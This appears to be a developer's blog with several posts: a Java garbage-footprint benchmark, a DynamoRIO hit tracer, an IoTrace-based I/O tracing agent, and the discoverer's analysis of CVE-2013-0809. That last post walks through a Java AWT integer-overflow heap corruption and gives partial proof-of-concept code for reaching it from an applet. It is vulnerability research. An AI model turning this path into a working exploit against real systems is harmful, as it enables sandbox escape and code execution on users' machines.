Analyzing the “ecological footprint” of java algorithms

When trying to optimize algorithms implemented in java, not just cputime, and memory footprint are important, but often we are interested in the amount of generated garbage. If your service is bounded by some availability agreements having a deep knowledge about garbage collection is a must.

Tuning garbage collection is a complicated task. If you are interested in that, I’m proposing you to read these brilliant articles for start: [1], [2], [3]. Also there are some tools to poke around with GC at a deeper level: VisualVM, jol, Eclipse MAT, and possibly many others. It’s also noteworthy to mention that there is a promising ongoing pauseless GC development (named Shenandoah) for OpenJDK.

Scope of the analyzis

In this post I will compare 4 different implementations for an algorithmic problem, by checking their cputime, and garbage footprint.

The problem I’m trying to examine, is the following: we have a stream of (id, score) pairs, from which we want to select the ids of the top N best scoring pairs, without needing them to be returned in order.

We will evaluate the algorithms in two scenarios:

  • fixed size of input, variable size of the selected top N elements
  • fixed size of the selected top N elements, variable size of input

The algorithms implement this interface, where the sink function is responsible to add a new (id, score) pair from the stream, while the getTopN is responsible to get the top N best scoring elements:

    public interface TopNSelectAlg {
        void sink(int index, double score);
        int[] getTopN(int topN);
    }

Implementations

I’ve created the following implementations:

Simple priority queue based

This is a simple naive implementation. We collect the (id, score) pairs represented by a simple POJO class named Entry in a java.util.PriorityQueue, and fetch the top N elements by calling the poll() function of the priority queue N times in a row. Just a note: this implementation will return the top N elements ordered, which was not required by the problem specification. Addition of one element is O(log(current_size)) complexity, calculating the topN element is topN * O(log(input_size)).
[source]

Native priority queue based

This implementation is based on a native priority queue (by native i mean here that we use scalar typed arrays for ids, and scores, repectively int[] and double[]). The top N elements are calculated on the fly: if the new (id, score) pair added to the queue is worst scoring than the minimum element in the queue, then its discarded, otherwise we remove the minimum element from the priorityqueue and add the new one. Fetching the top N elements is simply returning the internal id vector of the queue. Addition of one element to the queue is O(1) or O(log(topN)), complexity based on the score of the new element, calculating the top N is O(1).
[source]

Quickselect

Quickselect is an inplace selection algorithm. This means we need to have the full input in an array, and the algorithm moves the topN elements to the beginning of the array. Its working mechanism is similar to Quicksort, but it only needs to handle one pivot element, and because we don’t need to have the array fully sorted, we need to do the recursive descent only in one partition of the data. We collect the elements in a dynamically sized array, and apply the algorithm to it when the getTopN function is called. The algorithms average time complexity is O(input_size), while in the worst case it can be O(input_size2).
[source]

Quickselect with fixed size buffer

Since as one can suspect that the default quickselect algorithm requires a lot of memory (it needs to hold the full stream in memory), we can slightly modify it: instead of dynamically sized arrays we use fixed size arrays, allocated to the size of topN * loadFactor, and run the quickselect algorithm if the array gets full. This allows us to calculate the topN elements of the partial data, and after each calculation we have (loadFactor - 1) * topN space available to add new elements before we need to rerun the quickselect algorithm.
[source]

Measuring generated garbage

Our goal is to measure the generated garbage between two points in the program execution flow. We can query garbage collector statistics through the garbage collector MXBean, from which in certain circumstances we can infer information about the generated garbage. The idea is originating from one of my colleagues (@pila), credits for this go to him.

Note: experiments were performed using the latest version of Sun JRE 7, using default garbage collector settings which means PS Scavange for young collection and PS MarkSweep for old collection.

We need to make the following restrictions:

  • During the evaluation of the algorithm, the size of the old generation shouldn’t change, or at least shouldn’t change too much: we can achieve this by starting the JVM with big eden space, for example specifying -XX:MaxNewSize=1G
  • During the evaluation of the algorithm, the size of the eden space should not change. This can be achieved by specifying the minimum size of the eden space to the same as the maximum using the following JVM option -XX:NewSize=1G, and also disabling adaptive size policy -XX:-UseAdaptiveSizePolicy
  • We need to disable TLABs (Thread Local Allocation Buffer). TLABs are used by the JVM to speed up object allocation in the eden space, by preallocating bigger chunks of memory, and serve object allocation requests from this preallocated memory area. By disabling it the performance of the application slightly degrades, but we will be able to measure memory allocations more precizely. To disable TLAB, use the -XX:-UseTLAB JVM option.
  • Make sure no other threads are running. Since the garbage collector statistics is global, if other threads are running, the garbage generated by them can not be distinguished from the garbage generated by the thread we are trying to examine.

We use the following method to derive the generated garbage between two points in the execution flow of the program:

  • save garbage collector statistics at both of the points
  • check that the prerequisites are met between the two point
  • if no garbage collection happened estimate the generated garbage by the difference in eden space usage size
  • if there was at least one garbage collection cycle, calculate the generated garbage by assuming that at each garbage collection cycle cleared out the whole eden space (which is eden space committed size)

Check the provided implementation in GCMeasure.java

Results

I’ve divided the algorithms into three parts, and measured cputime, and generated garbage for each of them. These parts are:

  • CREATE: creating the algorithm
  • ADD: adding all the elements in the stream
  • TOP: fetching the top N best elements

Fixed input, variable topN

In these measurements, i’ve used a random input of 1000000 elements, while I varied topN from 40000 to 960000.

For the simple priority queue based algorithm we see that the addition takes the same cputime and generates the same amount of garbage independent from the topN size, since we need to add all the elements to the priorityqueue. Fetching the topN elements can be very slow especially if topN is big (compared to the size of the input).

Priority Queue based implementation

For the native priority queue we can see that most of the memory allocations happen, while instantiating the algorithm, and also when we copy the result from this internal structure, to the caller of getTopN. We also can see that all the cpu time is consumed by the addition of the elements, which is also plausible, since the queue always holds the topN elements of the partially added stream, so all the work is done during the add operation. We also can see, that this algorithm is efficient if topN is relatively small or relatively big compared to the size of the input.

Priority queue based implementation, native

The quickselect algorithm has nearly the same memory footprint as the simple priorityqueue based variant, because it also needs to keep the whole structure in memory, before it can apply the algorithm. We can also see, that the execution times got better, and are somewhat independent from topN.

QuickSelect based implementation

The modified quickselect with fixed buffer, has a really nice memory footprint, and has execution times which are competing with the standard quickselect algorithm. It is interesting to see, that the execution graph changes charactersitics around topN = 700k. This is because the loadfactor of this config is 1.5, so if topN is bigger than (1000000/1.5 = ~660k), then the quickselect algorithm is only runned once, because we never hit the end of the allocated array, while adding new elements from the stream. This also explains, why the execution times are getting bigger as topN approaches 0, because quickselect needs to be executed several times more to calculate the partial state.

Quickselect based implementation with fixed buffer

These statements can be verified, if we set the loadFactor to a bigger value (3.0 in this example), which increases performance, and also the garbage footprint:
Quickselect based implementation with fixed buffer, and different loadfactor

Fixed topN, variable input

In these series of experiments, I’m interested in the top 1000 elements on a varied input size ranging from 40000 to 96000 items.

For the simple priority queue based implementation we can see that both response times and garbage footprint are proportional to the size of the input. Compared to the previous case, the time for querying the topN items disappeares, compared to the time used by the add function. From the steps of the garbage footprint graph we can infer that the priority queue implementation in java is baked by some dynamical sized array.

pq_2

For the native array based priority queue we can see that in this use case it produces the best response times, while the generated garbage is also pretty low. I would expected different proportions on the generated garbage graph, for example i would expect fetching the top, which is simply an array copy should be the same size as create. I didn’t dig more deeper into this, but I think its because we measure globally generated garbage, and when the garbage footprint is this small, garbage produced by other parts of the code are not negligible, compared to the other cases when the garbage generated by the algorithm is a lot of times bigger.

pqnat_2

Nothing surprizing in the results for quickselect, except that we can see, as the dynamically sized arrays double the size of their internal native array at certain points.

qs_2

For the fixed size quickselect implementation we can see that the garbage footprint is similar to the native priority queue, while the cputime is somewhat worst.
qsfixed_2

But this can be also optimized by changing the loadfactor parameter to a bit higher, which of course increases the memory footprint too:
qsfixed3_2

qsfixed10_2

Sources

Sources are available at github.

Posted in Benchmark, Java | Tagged , , , , | Leave a comment

Implementing a simple hit tracer in DynamoRIO

It is a while ago, when I last posted to this blog. Lately I’m focusing my interest more on mathematics (statistical inference, machine learning) and software engineering (functional reactive programming), than on software security. (Maybe I will post in those topics too in the future.)

Today, I’ve decided to spend the day doing something “binary-related”, so I’ve picked up an old “todo” item, and decided to try out DynamoRIO, a Dynamic Binary Instrumentation tool.

Dynamic Binary Instrumentation

Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of a binary application at runtime through the injection of instrumentation code. This code executes as part of the normal instruction flow, but usually it is transparent to the application. The main differences between static and dynamic binary analysis are, that instead of exercising all codepaths, what may occur, dynamic analysis provides detailed insight into the concrete execution state of the application. (If you are interested more deeply in this topic here is a good and detailed overview.)

DynamoRIO

There are several DBI tools/frameworks including but not limited to:

DynamoRIO is a process virtualization system. Process virtualization provides an environment, within which an unmodified application can be monitored and controlled while it executes. It exports an interface for building dynamic tools for analysis, profiling, instrumentation, optimization, translation, sandboxing, etc. The API abstracts away the details of the virtualization process and focuses on monitoring or modifying the dynamic code stream of the program.

Some features of DynamoRIO (copied from wikipedia):

  • A tool can insert trampolines into the program that invoke tool actions at specific program points.
  • A tool can also insert instrumentation at the assembly language level, which provides fine-grained control over tool actions and tool performance.
  • It supports adaptive optimization and adaptive instrumentation by allowing a tool to remove or modify its instrumentation at any point throughout the execution of the target program.
  • It invokes tool-registered callbacks at a number of common program event points, such as thread creation, library loading, system calls, signals, or exceptions. Its API also allows inspecting the program’s libraries and address space in addition to its code.

For more detailed informations about DynamoRIO, check the project’s documentation and this article.

Hit tracing

I found a good post about fuzzing and hit tracing, which gave me the idea originally. I’m doing security research under GNU/Linux, which has less security tools available out of the box, compared to other operating systems. Not to mention, that I don’t own an IDA Pro, so implementing a hit tracer in DynamoRIO (as also mentioned in the post) seemed straightforward. And it took only 150 lines of code, and just a few hours. (As I got more familiar with DynamoRIO it turned out it has a hit tracer tool (‘drcov’) already implemented in a more sophisticated manner, but my “naive” implementation of hittracer also works like a charm.)

Implementation

To create a simple module, we need to define the dr_init function with the DR_EXPORT modifier. This function will be the entrypoint of our tool. In the following example, we see a module, which registers an ‘exit’ event listener, what will be called if the program exits. This is the simplest module available:

#include <stddef.h>
#include <dr_api.h>

static void event_exit(void);

DR_EXPORT void dr_init(client_id_t id) {
    dr_printf("init");
    dr_register_exit_event(event_exit);
} 

static void event_exit(void) {
    dr_printf("exit");
}

For the next step, we will add event listeners for module load/unload events. Since module loads/unloads can happen from multiple simultaneous threads, we need to protect the global structure, which stores the information about the modules loaded by the application:

#include <stddef.h>
#include <dr_api.h>

#define MAX_NUM_MODULES 256

/* module info structure */
typedef struct _module_array_t {
    unsigned long base;
    unsigned long end;
    unsigned int count;
    size_t size;
    bool   loaded;
    module_data_t *info;
    byte* bitmap;
} module_array_t;

/* modules loaded by the application */
static module_array_t mod_array[MAX_NUM_MODULES];
/* number of modules in the mod_array */
static int mod_count = 0;
/* mutex for accessing mod_array structure */
static void *mod_lock;

static void event_exit(void);
static void event_module_load(void *drcontext, const module_data_t *info, bool loaded);
static void event_module_unload(void *drcontext, const module_data_t *info);

DR_EXPORT void dr_init(client_id_t id) {
    mod_lock = dr_mutex_create();

    dr_register_module_load_event(event_module_load);
    dr_register_module_unload_event(event_module_unload);

    dr_register_exit_event(event_exit);
    dr_log(NULL, LOG_ALL, 1, "Client 'bbhit' initializing\n");	
}

static void event_exit(void) {
    dr_mutex_destroy(mod_lock);
}

static bool module_data_same(const module_data_t *d1, const module_data_t *d2) {
    if (d1->start == d2->start && d1->end == d2->end && d1->entry_point == d2->entry_point &&
        dr_module_preferred_name(d1) != NULL && dr_module_preferred_name(d2) != NULL &&
        strcmp(dr_module_preferred_name(d1), dr_module_preferred_name(d2)) == 0)
		return true;
    return false;
}

static void event_module_load(void *drcontext, const module_data_t *info, bool loaded) {
	int i;
	dr_log(drcontext, LOG_ALL, 1, "Module load event: %s [%s]\n", dr_module_preferred_name(info) , info->full_path);
    dr_mutex_lock(mod_lock);
    for (i = 0; i < mod_count; i++) {
        if (!mod_array[i].loaded && module_data_same(mod_array[i].info, info)) {
            /* Module found, but unloaded. Toggle the loaded flag. */
            mod_array[i].loaded = true;
            break;
        }
    }
    if (i == mod_count) {
        /* Module not found, register new one. */
        mod_array[i].base   = (unsigned long)info->start;
        mod_array[i].end    = (unsigned long)info->end;
        mod_array[i].loaded = true;
        mod_array[i].info   = dr_copy_module_data(info);
        mod_array[i].count   = 0;
        mod_array[i].size   = mod_array[i].end-mod_array[i].base;
        mod_array[i].bitmap = (byte*) malloc(mod_array[i].size);
        mod_count++;
    }
    dr_mutex_unlock(mod_lock);
}

static void event_module_unload(void *drcontext, const module_data_t *info) {
    int i;
    dr_log(drcontext, LOG_ALL, 1, "Module unload event: %s [%s]\n", dr_module_preferred_name(info) , info->full_path);
    dr_mutex_lock(mod_lock);
    for (i = 0; i < mod_count; i++) {
        if (mod_array[i].loaded && module_data_same(mod_array[i].info, info)) {
            mod_array[i].loaded = false;
            break;
        }
    }
    dr_mutex_unlock(mod_lock);
}

At first we need to define the module_array_t type, which will contain all the necessary module information. The field base, end and size indicate the beginning address, the end address, and the size of the module’s memory area, count will be used to indicate, how many time basic blocks were executed in this module, and loaded indicates if the module is active currently or not. We also save the original module information structure, and a bitmap, which will be used for basic block hit counting later. Currently the number of loaded modules is limited by the MAX_NUM_MODULES constant. This can optimized away in the future, by replacing the module array with a self-balancing tree, or similar structure.

The dr_init function creates mod_lock mutex, the registers event_module_load, event_module_unload event listeners. The event_module_load listener tries to search for a previously loaded, but currently unloaded module, and if founds one, it will set the loaded flag to true, otherwise creates a new module entry in the mod_array structure. The event_module_unload listener finds the module which is getting unloaded, and sets its loaded flag to false. The module_data_same function is a comparator of the module_data structure.

The next step is to add basic block tracking:

DR_EXPORT void dr_init(client_id_t id) {
    [...]
    dr_register_bb_event(event_basic_block);
    [...]
}

static dr_emit_flags_t event_basic_block(void *drcontext, void *tag, instrlist_t *bb, bool for_trace, bool translating) {
	int i;
    for (i = 0; i < mod_count; i++) {
		unsigned long tag_pc = (unsigned long)tag;
        if (mod_array[i].base <= tag_pc && mod_array[i].end >= tag_pc) {
			mod_array[i].count++;
			if (mod_array[i].bitmap != NULL)
				mod_array[i].bitmap[tag_pc - mod_array[i].base] = 1;
			break;
		}
	}
    return DR_EMIT_DEFAULT;
}

The code is simple. First we search for the module this basic block belongs to, and if that module descriptors bitmap field is not empty we set the bitmap[PC-modulebase] byte to 1 indicating that a basic block got the execution control. Since we only write here, there is no additional synchronization used. (Note: in this naive implementation, searching for the corresponding module is O(n), where n indicates the number of loaded modules, which means the more modules the application used, the more overhead the tool will cause. It is possible to replace the array to a rebalancing tree to reduce this lookup to O(log(n)) and add some additional heuristics (to try first with the module which contained the last basic block) in an improved future release.)

The latest step is to display the gathered information. We need to iterate through the modules, and check the positions, where the modules bitmap array is not zero. These positions indicate basic blocks that had executed while the tool was running.

I’ve added some symbol resolution too, to make it a bit more fancier.

static drsym_info_t* create_drsym_info() {
	drsym_info_t* info;
	info = malloc(sizeof(drsym_info_t));
	info->struct_size = sizeof(drsym_info_t);
	info->debug_kind = DRSYM_SYMBOLS;	
	info->name_size = 256;
	info->file_size = 256;
	info->file=malloc(256);
	info->name=malloc(256);
	return info;
}

static void free_drsmy_info(drsym_info_t * info) {
	if (info->file != NULL) 
		free(info->file);
	if (info->name != NULL) 
		free(info->name);
	free(info);
}

static void event_exit(void) {
	int i,j;
	drsym_init(0);
	drsym_info_t* syminfo = create_drsym_info();
	drsym_error_t err;
    dr_mutex_lock(mod_lock);
	dr_printf("\n===\nModules:\n");
    for (i = 0; i < mod_count; i++) {
		syminfo->start_offs = 0;
		syminfo->end_offs = 0;
		dr_printf("\t- [%c] (%8d) %s [%s]\n", (mod_array[i].loaded ? '+':'-'), mod_array[i].count, dr_module_preferred_name(mod_array[i].info) , mod_array[i].info->full_path);
		if (mod_array[i].bitmap != NULL) {
			for(j=0; j < mod_array[i].size; j++) {
				if (mod_array[i].bitmap[j] != 0) {
					int old = (syminfo->start_offs <= j && syminfo->end_offs >= j);
					if (!old)
						err = drsym_lookup_address (mod_array[i].info->full_path, j, syminfo, DRSYM_LEAVE_MANGLED);
					if (old || err == DRSYM_SUCCESS || err == DRSYM_ERROR_LINE_NOT_AVAILABLE) {
						dr_printf("\t\t- basic_block " PFX " - [%08x -- %08x] %s\n", mod_array[i].base + j, syminfo->start_offs, syminfo->end_offs, syminfo->name);	
					} else {
						dr_printf("\t\t- basic_block " PFX "\n", mod_array[i].base + j);
					}
				}
			}
		}
		dr_free_module_data(mod_array[i].info);
		if (mod_array[i].bitmap != NULL)
			free(mod_array[i].bitmap);
	}
    dr_mutex_unlock(mod_lock);
	dr_mutex_destroy(mod_lock);
	free_drsmy_info(syminfo);
	drsym_exit();
    dr_printf("Instrumentation results:\n%10d basic block executions\n", global_count);
}

You can download the source code of the tool, and a sample output for a simple program.

Conclusion

I’ve only used just a limited subset of DynamoRIO’s API, but it seems for me that it is a powerfull tool for dynamic binary analysis.

Posted in Fun, Security | Tagged , , , | Leave a comment

IO trace generation in java: experimenting with sun.misc.IoTrace

I’ve recently checked the new features in the latest release (1.7.0_40) of Oracle’s Java SE, when I stumbled upon a new class, sun.misc.IoTrace.

The source of sun.misc.IoTrace can be viewed here. Its basically and “empty” class, which does nothing, and if we want to gather IO trace statistics, we need to redefine it.

I’ve copied the interesting parts from its javadoc here:

Utility class used to identify trace points for I/O calls.

To use this class, a diagnostic tool must redefine this class with a version that contains calls to the the diagnostic tool. This implementation will then receive callbacks when file and socket operations are performed. The reason for requiring a redefine of the class is to avoid any overhead caused by the instrumentation.

Only blocking I/O operations are identified with this facility.

Warning
These methods are called from sensitive points in the I/O subsystem. Great care must be taken to not interfere with ongoing operations or cause deadlocks. In particular:

  • Implementations must not throw exceptions since this will cause disruptions to the I/O operations.
  • Implementations must not do I/O operations since this will lead to an endless loop.
  • Since the hooks may be called while holding low-level locks in the I/O subsystem, implementations must be careful with synchronization or interaction with other threads to avoid deadlocks in the VM.

Calls to IOTrace were added to the following classes:

  • java.io.FileOutputStream
  • java.io.FileInputStream
  • java.io.RandomAccessFile
  • java.net.SocketInputStream
  • java.net.SocketOutputStream

Here is an example of the modifications (from FileOutputStream.java):

322,329c305
<         Object traceContext = IoTrace.fileWriteBegin(path);
<         int bytesWritten = 0;
<         try {
<             writeBytes(b, 0, b.length, append);
<             bytesWritten = b.length;
<         } finally {
<             IoTrace.fileWriteEnd(traceContext, bytesWritten);
<         }
---
>         writeBytes(b, 0, b.length, append);

The OpenJDK source comes in handy on how to redefine the IOTrace class.

Based on this I wrote a “naive” agent (source), which collects the IO trace statistics, stores it in StringBuffer-s, and uses a background thread to write it out periodically to the disk. (I know this is not the correct way, so I’ve mounted a tmpfs where the output is written, so it should not interfere with the disks which are traced.)

Unfortunatelly the agent hangs on higher loads (high number of threads) in “interpreted only”(-Xint) and normal mode, although it runs smoothly if it is started in “compiled” mode.

I’m not sure if this is the problem of the agent implementations, because it doesn’t violates the warnings above (except using AtomicReference, which I don’t think can cause this problem). If anyone has an idea what can cause this behaviour, feel free to share it with me.

You need to add these lines to MANIFEST.MF when creating the agent jar:

Premain-Class: IoTraceAgent
Can-Redefine-Classes: true
Boot-Class-Path: iotraceagent.jar

You need to add this option to the java commandline, if you want to load the agent:

-javaagent:<path>/iotraceagent.jar

It will generate similar output like this (start of a jetty server):

2614    T1      R          11321            1312        /opt/local/jdk1.7.0_40/jre/lib/zi/Europe/Budapest
4396    T1      R             48            2090        /opt/local/jdk1.7.0_40/jre/lib/meta-index
4457    T1      R             24               0        /opt/local/jdk1.7.0_40/jre/lib/meta-index
4954    T1      R           6189            4200        /opt/local/jdk1.7.0_40/jre/lib/currency.data
6165    T1      R            135            2277        <removed>/jetty-distribution-8.1.5.v20120716/start.ini
6165    T1      R             74               0        <removed>/jetty-distribution-8.1.5.v20120716/start.ini
7601    T1      R             15            8192        /opt/local/jdk1.7.0_40/jre/lib/security/java.security
7621    T1      R             32            8192        /opt/local/jdk1.7.0_40/jre/lib/security/java.security
7622    T1      R             11            1223        /opt/local/jdk1.7.0_40/jre/lib/security/java.security
7622    T1      R              7               0        /opt/local/jdk1.7.0_40/jre/lib/security/java.security
14487   T1      R            227            3637        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty.xml
17395   T1      R            138               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty.xml
19060   T1      R             83            1078        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-annotations.xml
19230   T1      R             90               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-annotations.xml
19295   T1      R             64            2049        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-deploy.xml
19297   T1      R             83               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-deploy.xml
19359   T1      R            163            1451        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-webapps.xml
19362   T1      R             65               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-webapps.xml
19412   T1      R            145            1190        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-contexts.xml
19415   T1      R             56               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-contexts.xml
19436   T1      R             50            1044        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-testrealm.xml
19439   T1      R             55               0        <removed>/jetty-distribution-8.1.5.v20120716/etc/jetty-testrealm.xml
21246   T1      R             34            8192        <removed>/jetty-distribution-8.1.5.v20120716/webapps/spdy.war

And similar for the socket-io trace (mysql communication):

46296   T37     R           1420              90               0        /192.168.0.1:3306
46311   T1      R           4629              90               0        /192.168.0.1:3306
46523   T1      R             32              11               0        /192.168.0.1:3306
46508   T37     R          19175               4               0        /192.168.0.1:3306
46527   T37     R              4               7               0        /192.168.0.1:3306
46669   T1      R          12177               4               0        /192.168.0.1:3306
46682   T1      R             17             709               0        /192.168.0.1:3306
46678   T37     R          14013               4               0        /192.168.0.1:3306
46693   T37     R              4             709               0        /192.168.0.1:3306
47170   T1      R           9564               4               0        /192.168.0.1:3306
47180   T1      R              4              85               0        /192.168.0.1:3306
47202   T37     R           9761               4               0        /192.168.0.1:3306
47212   T37     R              4              85               0        /192.168.0.1:3306
47231   T37     R          11117               4               0        /192.168.0.1:3306
47242   T37     R             13            1352               0        /192.168.0.1:3306
47243   T37     R              2            1356               0        /192.168.0.1:3306
47243   T37     R            835               1               0        /192.168.0.1:3306
47244   T37     R             10            1355               0        /192.168.0.1:3306
47244   T37     R              1            1356               0        /192.168.0.1:3306
47244   T37     R              5            1356               0        /192.168.0.1:3306
47245   T37     R              1            1086               0        /192.168.0.1:3306
47239   T1      R          10512               4               0        /192.168.0.1:3306
47249   T1      R              5            1352               0        /192.168.0.1:3306
47249   T1      R            175               1               0        /192.168.0.1:3306
47249   T1      R              2            1355               0        /192.168.0.1:3306

The columns are:

  • time elapsed from agent start (millisec)
  • thread id
  • type of operation
  • duration (microsec)
  • bytes read or written
  • timeout (only for sockets)
  • resource (filename, socket address)

Some final notes:

  • I’m only tested the agent with some “demo” level applications
  • The agent needs to be enhanced to handle high IO loads
  • Still need to solve the hanging problem of JVM
  • I’m planning to create a tool to post-process and visualize the data
  • If you could use an iotracer tool for your java applications check back later
  • If you are interested in collaborating to create a high-quality iotracer tool for java, feel free to contact me

Update: (09.25.)

I’ve added some preliminary visualisation because raw data is boring:

Web application in jetty, events displayed by file-groups, minutes scale:
IO1

Web application in jetty, events displayed by file-groups, seconds scale:
IO3

Web application in jetty, events displayed by threads:
IO4

Posted in Benchmark | Tagged , , , | 3 Comments

Analysis of CVE-2013-0809

This post is about the analysis of CVE-2013-0809, a java security bug I’ve found. As it is common for java bugs, the most relevant information can be found in RedHat’s CVE database and in RedHat’s bugzilla. In this case it is the description of the bug: “Specially crafted sample model integer overflow”, and a link to the OpenJDK patch.

I was checking the native code of the java runtime library, searching for integer overflow bugs in malloc function calls, when I spotted this bug. It turned out later, that the biggest challenge is to reach the vulnerable native code.

The vulnerability

The bug is a simple integer overflow in the AWT MediaLib component:

The mlib_ImageCreate function of mlib_ImageCreate.c doesn’t checks the preconditions of a malloc, so we can make the

width * height * channels

expression — which is the argument of the malloc call — overflow.

share/native/sun/awt/medialib/mlib_ImageCreate.c:

	mlib_image *mlib_ImageCreate(mlib_type type, mlib_s32  channels, mlib_s32  width, mlib_s32  height) {
		// preconditions check
		if (width <= 0 || height <= 0 || channels < 1 || channels > 4) {
			return NULL;
		};
		// calculating the size
		switch (type) {
			[...]
			case MLIB_BYTE:
				wb = width * channels;
				break;
			case MLIB_INT:
				wb = width * channels * 4;
				break;
			[...]
		}
		[...]
		// overflow 
		data = mlib_malloc(wb * height);
		[...]
	}

The only caller of the above method is the allocateArray function, in the awt_ImagingLib.c module:

share/native/sun/awt/medialib/awt_ImagingLib.c:

	static int allocateArray(JNIEnv *env, BufImageS_t *imageP, mlib_image **mlibImagePP, void **dataPP, int isSrc, int cvtToDefault, int addAlpha) {
		RasterS_t *rasterP = &imageP->raster;
		[...]		
		width  = rasterP->width;
		height = rasterP->height;

		if (cvtToDefault) {
			int status = 0;
			
			// the vulnerable function is called here
			// the cDataP will point to the malloced area
        	*mlibImagePP = (*sMlibSysFns.createFP)(MLIB_BYTE, 4, width, height); 	
        	cDataP  = (unsigned char *) mlib_ImageGetData(*mlibImagePP);			
		    
		    // we fill the malloced area with 0-s
		    // note: the overflow happens here too
		    memset(cDataP, 0, width*height*4);

			// based on the ColorModel and Type type the data is 
			// copied from  the java code to the native code
			switch(imageP->cmodel.cmType) {
				case INDEX_CM_TYPE:
					[...]
				case DIRECT_CM_TYPE:
					[...]
			} 
			// if we don't use anything special, 
			// this function will handle the copy
			return cvtCustomToDefault(env, imageP, -1, cDataP);
		[...]
	}

We can see here, that the value of width and height is carried by the imageP structure. Now we should check the cvtCustomToDefault function, to see how the copy happens:

share/native/sun/awt/medialib/awt_ImagingLib.c:

	static int cvtCustomToDefault(JNIEnv *env, BufImageS_t *imageP, int component, unsigned char *dataP) {
		#define NUM_LINES    10
   		int numLines = NUM_LINES;
		int nbytes = rasterP->width*4*NUM_LINES;

		for (y=0; y < rasterP->height; y+=numLines) {
			[...]
			// call the getRGB function of the imageP structure
			jpixels = (*env)->CallObjectMethod(env, imageP->jimage, g_BImgGetRGBMID, 0, y, 
							rasterP->width, numLines, jpixels,0, rasterP->width);


			[...] 
	        pixels = (*env)->GetPrimitiveArrayCritical(env, jpixels, NULL);
		
			// overwriting the overflowed area with the data provided by the getRGB function
	        memcpy(dP, pixels, nbytes);
			dP += nbytes;        

	        (*env)->ReleasePrimitiveArrayCritical(env, jpixels, pixels, JNI_ABORT);
			[...]
		}
		[...]
	}

Analysing the code above, we can see how the data is copied by 10 lines from the BufferedImage java object into the native image structure. Typical problem with integer overflows is that we usually allocate a small memory region (thanks to the overflow), but when we overwrite the allocated area, we usually need to write a large amount of data. By doing this, we are overwriting important parts of the program code/data, which at the end will crash the program in a few steps after the overwrite happens. In this cases the most important thing is to figure out, how we can create an exit/stop condition from the copy. In the code above that is relatively simple: we just need to throw an exception in the getRGB function when we copied enough data, as we will see later.

Time to summarize the information we have about the overflow:

  • The size of the malloced area: (width * height * 4) modulo 0xffffffff
  • The size of the overwritten area: width * 10 * 4 * k, where 4 is the number of channels and k is in 0,1,2,3,… depending on in which iteration we throw the exception

Reaching the vulnerable code

As we can see, the allocateArray function is static, so we need to find a code-path from a JNI entry point. In our case these are the following:

  • Java_sun_awt_image_ImagingLib_convolveBI
  • Java_sun_awt_image_ImagingLib_tansformBI
  • Java_sun_awt_image_ImagingLib_lookupBI

I choosed the convolveBI function for the PoC:

	JNIEXPORT jint JNICALL
	Java_sun_awt_image_ImagingLib_convolveBI(JNIEnv *env, jobject this, jobject jsrc, jobject jdst, jobject jkernel, jint edgeHint)

Which looks like this from the interpreted code:

	static public native int convolveBI(BufferedImage src, BufferedImage dst, Kernel kernel, int edgeHint);

The above function is in a restricted package (sun.*) so it can’t be called directly by an applet, we need to follow the call hierarchy further, till we reach the filter function of the java.awt.image.ConvolveOp class.

It is time to gather all the preconditions, what need to be satisfied to reach the vulnerable code. First the CovolveOp class validates, that the ColorModel and Raster of the Image supplied as a parameter to the filter function are compatible with each other, and handles converting them if necessary. The easiest way is to choose this parameters to be compatible by default.

There are also some prerequisites defined by the convolveBi function. This is a quite big function, we need to go through it line-by-line, and collect all conditions needed by this and all the called functions. (This can be seen in awt_ImagingLib.c)

  • convolveBI
    • validating the size of the kernel, checking for overflow
    • awt_parseImage (source image)
      • awt_parseRaster
        • checking some properties of the Raster object
        • checking the type of the raster, it needs to be one of theese:
          • IntegerComponentRaster
          • ByteComponentRaster
          • ShortComponentRaster
          • BytePackedRaster
      • awt_parseColorModel
        • checking some properties of the ColorModel object
    • awt_parseImage (destination image)
      • [...] see above
    • setImageHints
      • some extra Raster and ColorModel conditions
    • allocateArray
      • the vulnerable function

The preconditions for the colorband and similar properties can be satisfied easily, the main problem is the type of the Raster object. All the classes which are acceptable are in the restricted sun.* namespace. Fortunately we can get a BytePackedRaster instance using the method createWriteableRaster of java.awt.image.Raster, so we try to choose the ColorModel and the SampleModel to this type of Raster class. These are the PackedColorModel, and the MultiPixelPackedSampleModel classes.

The next problem is that the constructor of the SampleModel class verifies that the width * height product is not overflowing:

	public SampleModel(int dataType, int w, int h, int numBands) {
		long size = (long)w * h;
		if (w <= 0 || h <= 0) {
				throw new IllegalArgumentException("Width ("+w+") and height ("+h+") must be > 0");
		}
		if (size >= Integer.MAX_VALUE) {
				throw new IllegalArgumentException("Dimensions (width="+w+ " height="+h+") are too large");
		}
		[...]

Luckily (although no reason why) the width and height members have protected visibility, which means we can create a derived class which satisfies the preconditions when the constructor of the parent class (SampleModel) is checking them, but change the members later with prepared values to cause overflow when doing the native call.

The next problem is that the parent class validates the size of the DataBuffer:

	((dataBitOffset + (this.height-1) * scanlineStride * 8 + (this.width-1) * numberOfBits + numberOfBits - 1)/8)));

If the expression above is bigger than the size of the DataBuffer specified, we get an exception. Luckily again, by choosing a negative scanlineStride value, this expression can be made to take arbitrary value.

We end up with the following class, which takes a key role to reach the vulnerable code-path:

	public static class MySampleModel extends MultiPixelPackedSampleModel {
		private static final int w = 1;
		private static final int h = 1;
		private static final int numberOfBits = 1;
		private static final int scanlineStride = -1;
		private static final int dataBitOffset = 0;
		
		public MySampleModel() {
			// by setting width and height to 1 and choosing a negative scanlineStride value, 
 			// we can satisfy all the preconditions of the parent class
			super(DataBuffer.TYPE_BYTE, w, h, numberOfBits, scanlineStride, dataBitOffset);

			// now we can freely overwrite the values
			this.width = 5;
			this.height = 0x40000010/this.width;

			// print some debug info
			System.err.println(String.format("%x", this.width * this.height * 4));
			System.err.println(String.format("%x", this.width*4*10));
